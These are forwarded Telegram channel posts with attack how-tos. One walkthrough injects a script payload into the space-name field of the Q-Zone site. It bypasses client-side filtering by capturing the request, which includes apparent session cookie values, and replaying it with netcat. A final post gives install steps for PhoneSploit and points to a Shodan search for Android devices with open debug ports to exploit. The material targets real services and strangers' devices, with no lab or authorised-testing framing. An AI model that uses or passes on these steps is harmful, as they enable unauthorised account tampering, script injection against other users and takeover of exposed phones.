Forwarded from PRIVATE UNDERCODE
Analysis of Q-Zone cross-site vulnerability
youtube.com/undercode
1) Q-Zone filters user input
After entering Q-Zone, click "Settings → Space Settings → Space Name" in turn; this is where the display name of the space can be modified. If we write executable script code here and the filtering is not strict, it will be saved on the home page as well, and the code will execute and attack the browser. Let's first test whether we can write a cross-site script in this input box:
2) When entering the code <script>alert("test")</script> in the "Input Space Name" box, I found that the input length was limited: only 24 characters could be entered in total. And when we enter code of the permitted length and click Submit, a dialog box saying "Please do not include <> etc. characters in the input" pops up. It seems that Q-Zone filters the user's input.
3) Check the input filtering method of Q-Zone
Click "View → Source File" on the Q-Zone page. At the beginning of the code you can see the following segment:
if (!checkFormValue(form1)) return false;
len = StrLenOfAscii(form1.spacename.value) / 2;
if (len > 12) {
4) Anyone with a little ASP programming background can understand this code. The "StrLenOfAscii()" function obtains the length of the user input in ASCII code, divides it by 2 and assigns the value to the len variable. If the following code detects that len is greater than 12, it prompts that the name is too long. The most important part is the previous line, "if (!checkFormValue(form1)) return false", where the "checkFormValue()" function can obviously be inferred to check whether the input contains special characters. When it detects filtered characters, the aforementioned dialog box pops up.
5) Through this analysis, we can be sure that Q-Zone filters the user input on the client side.
written by undercode
Forwarded from PRIVATE UNDERCODE
Exploitation of Q-Zone cross-site vulnerability:
t.me/UndercodeTesting
1) Since Q-Zone filters the user input on the client, it leaves us an opening: we can bypass the client-side limits and directly modify the data being submitted. But Q-Zone imposes another restriction on submitted data: submissions from external sites are not allowed, so an HTML file saved locally cannot submit the data normally. Therefore, we must find another way to modify the submitted data.
2) We first run a program called WSockExpert. After it starts, click the "Open" button on the toolbar to display the current process list. If you opened Q-Zone from the QQ panel, select "QQ.exe → **'s home" in the process list; if you opened Q-Zone with IE, find the corresponding process under the IE process and confirm it. Then click the "Open" button to start monitoring the data exchanged with the website server.
3) Return to the Q-Zone web page, enter any characters that can be submitted, such as "1234567890", as the "space name", and click "Submit". Back in WSockExpert, click the third row near the "send" data column, and you can see the content of the submitted data:
4) Content-Length: 20
Cookie: pvid=1575119174; portalentryurl=http://vnet.qq.com/hn/; zzpaneluin=41346583; zzpanelkey=753923CF61AB165D613966B82F8E7F6B2D9E5A681CE7507E9A677086A89BC6DD; clientver=1305; skey=; uin=g
spacename=1234567890
"Cookie" is the content of the cookie, which contains the user authentication; "spacename=1234567890" is the space name data we submitted; and the preceding "Content-Length: 20" is the length of the submitted data. In the data you can also see "Referer: http://q-zone.qq.com/cgi-bin/user/cgi_show_spacename", which is the address of the server page we are submitting to.
3) Modify the submitted data
After copying all the submitted data from the lower window, save it as a file 1.txt, then change "spacename=1234567890" in it to "spacename=<script>alert("test")</script>" and "Content-Length: 20" to "Content-Length: 40".
4) Now, as long as we submit this data to the server, we bypass the client-side filtering. This requires another tool called NC.
Copy the 1.txt saved above to the same folder as nc.exe, open a command prompt window in Windows, change to the folder where nc.exe is located, and enter "nc -vv q-zone.qq.com 80 < 1.txt". After the command executes, our modified data has been submitted to the remote server.
> We can change "test" to any Chinese text, but we need to convert it to IE code first. For example, the IE code for "test" is "%B2%E2%CA%D4".
5) Examine the results of code execution
Open our Q-Zone, and a prompt window pops up automatically. This means we have successfully inserted the <script>alert("test")</script> code into the remote webpage! At the same time, on the page for modifying the space name, you can see the originally restricted space name that has been submitted.
written by undercode
Forwarded from PRIVATE UNDERCODE
EXPLOIT
> updated - Using open Adb ports we can exploit a device
termux(root)-linux
Installation & Run:
1) git clone https://github.com/Zucccs/PhoneSploit
2) extract adb.rar to the phonesploit directory
3) cd PhoneSploit
4) pip install colorama
5) python2 main.py
6) IF ADB NOT FOUND
sudo apt update && sudo apt install android-tools-adb android-tools-fastboot
7) Using open Adb ports we can exploit a device
you can find open ports here https://www.shodan.io/search?query=android+debug+bridge+product%3A"Android+Debug+Bridge"
@undercodeTesting